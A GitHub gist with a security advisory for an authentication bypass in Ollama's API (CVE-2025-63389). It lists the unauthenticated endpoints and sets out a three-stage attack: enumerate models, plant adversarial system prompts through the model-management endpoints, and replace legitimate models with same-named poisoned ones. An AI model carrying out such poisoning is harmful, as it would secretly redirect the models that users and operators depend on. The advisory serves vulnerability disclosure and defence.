Skip to content

Instantly share code, notes, and snippets.

@Cristliu
Created December 18, 2025 07:27
Show Gist options
  • Select an option

  • Save Cristliu/48dae561696374744d9fced07a544ecd to your computer and use it in GitHub Desktop.

Select an option

Save Cristliu/48dae561696374744d9fced07a544ecd to your computer and use it in GitHub Desktop.
CVE-2025-63389 Security Advisory - Authentication Bypass in Ollama

Security Advisory: CVE-2025-63389 - Authentication Bypass in Ollama API

CVE ID: CVE-2025-63389 Date: 2025-12-18 Vendor: Ollama Product: Ollama Affected Versions: <= v0.12.3 Vulnerability Type: Incorrect Access Control / Authentication Bypass Severity: Critical (Code Execution, Privilege Escalation, Information Disclosure)

Summary

A critical authentication bypass vulnerability exists in Ollama platform's API endpoints in versions prior to and including v0.12.3. The platform exposes multiple API endpoints without requiring authentication, enabling remote attackers to perform unauthorized model management operations.

Vulnerability Details

  • Component: /api/tags, /v1/models, /api/copy, /api/delete, /api/create, /api/generate, /api/chat endpoints
  • Vulnerability: Missing authentication on critical API endpoints.

Attack Vector & Impact

Attack Type: Remote

Attack Vectors: An unauthenticated attacker can exploit the lack of authentication on Ollama's API endpoints to conduct a multi-stage attack:

  1. Reconnaissance: Use /api/tags and /v1/models to enumerate existing models.
  2. Resource Manipulation: Use /api/copy, /api/delete, and /api/create to inject malicious system prompts into model configurations.
  3. Model Poisoning: Create poisoned models with identical names but containing adversarial system prompts, delete legitimate models, and force users to interact with compromised models.

Impact:

  • Code Execution: Potential for RCE via malicious model configuration or prompt injection.
  • Escalation of Privileges: Unauthorized management of models.
  • Information Disclosure: Enumeration of installed models.
  • Model Poisoning: Manipulation of model behavior.

References

Credits

Discovered and reported by Zhihuang Liu (herecristliu@gmail.com)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment